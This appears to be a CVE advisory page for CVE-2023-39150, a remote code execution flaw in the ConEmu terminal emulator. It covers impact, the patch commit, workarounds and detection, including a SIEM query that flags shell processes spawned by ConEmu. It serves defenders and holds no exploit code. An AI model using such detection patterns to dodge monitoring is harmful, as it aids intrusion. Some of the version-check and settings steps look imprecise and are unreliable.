Login Sign Up

CVE-2023-39150

9.8 CRITICAL
Remote Code Execution

📋 TL;DR

CVE-2023-39150 is a critical vulnerability in ConEmu terminal emulator where improper sanitization of title responses containing control characters could allow arbitrary code execution. This affects users running ConEmu versions before commit 230724 (July 24, 2023). The vulnerability represents an incomplete fix for the previously disclosed CVE-2022-46387.

💻 Affected Systems

Products:
  • ConEmu
Versions: All versions before commit 60683a186628ffaa7689fcb64b3c38ced69287c1 (July 24, 2023)
Operating Systems: Windows
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability affects ConEmu when processing terminal title responses, which can occur during normal terminal operations including SSH sessions and remote connections.

📦 What is this software?

Conemu by Maximus5

View all CVEs affecting Conemu →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with attacker gaining complete control over the affected system, potentially leading to data theft, ransomware deployment, or lateral movement within the network.

🟠

Likely Case

Remote code execution with the privileges of the ConEmu user, allowing attackers to install malware, steal credentials, or pivot to other systems.

🟢

If Mitigated

Limited impact if proper network segmentation and least privilege principles are implemented, potentially containing the attack to isolated segments.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The vulnerability is related to a previously disclosed CVE (CVE-2022-46387) with known exploitation patterns, making weaponization likely. The public gist provides technical details that could facilitate exploit development.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Commit 60683a186628ffaa7689fcb64b3c38ced69287c1 or later (July 24, 2023+)

Vendor Advisory: https://github.com/Maximus5/ConEmu/commit/60683a186628ffaa7689fcb64b3c38ced69287c1

Restart Required: Yes

Instructions:

1. Download the latest ConEmu release from the official GitHub repository. 2. Uninstall the vulnerable version. 3. Install the updated version. 4. Restart any active ConEmu sessions.

🔧 Temporary Workarounds

Disable Terminal Title Updates

windows

Prevent ConEmu from processing terminal title responses which could contain malicious control characters

Set 'Features' -> 'ANSI X3.64' to 'Disable' in ConEmu settings

Use Alternative Terminal

windows

Temporarily switch to Windows Terminal, PowerShell, or cmd.exe until ConEmu is patched

🧯 If You Can't Patch

  • Network segmentation: Isolate systems running vulnerable ConEmu versions from critical assets
  • Application control: Restrict execution of unauthorized binaries to limit post-exploitation capabilities

🔍 How to Verify

Check if Vulnerable:

Check ConEmu version in Help -> About dialog. If build date is before July 24, 2023, the system is vulnerable.

Check Version:

conemu64.exe --version or check Help -> About in the ConEmu interface

Verify Fix Applied:

Verify ConEmu version shows build date July 24, 2023 or later in Help -> About dialog.

📡 Detection & Monitoring

Log Indicators:

  • Unusual process creation from ConEmu.exe
  • Suspicious command execution patterns in terminal sessions
  • Anomalous network connections originating from ConEmu processes

Network Indicators:

  • Unexpected outbound connections from ConEmu to external IPs
  • DNS queries for known malicious domains from ConEmu processes

SIEM Query:

Process Creation where ParentImage contains 'ConEmu.exe' AND (CommandLine contains 'powershell' OR CommandLine contains 'cmd.exe /c' OR CommandLine contains unusual patterns)

📊 Metadata

CVE ID: CVE-2023-39150
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Published: September 12, 2023
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON